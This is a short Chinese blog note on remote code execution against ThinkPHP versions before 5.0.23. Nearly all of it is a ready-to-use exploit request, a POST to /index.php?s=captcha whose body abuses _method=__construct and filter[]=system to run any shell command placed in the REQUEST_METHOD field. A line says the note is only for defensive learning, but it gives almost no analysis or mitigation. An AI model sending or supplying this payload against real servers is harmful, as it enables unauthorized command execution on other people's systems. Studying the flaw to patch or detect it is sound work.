【笔记】Thinkphp5漏洞利用

发表于 阅读次数:

前言

Thinkphp5.0.23之前的版本,通过远程代码执行进行漏洞利用

本文仅用于网络信息防御学习

构造请求

<command>:远程Shell命令

1
2
3
POST /index.php?s=captcha

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=<command>

完成

参考文献

哔哩哔哩——网络安全白帽子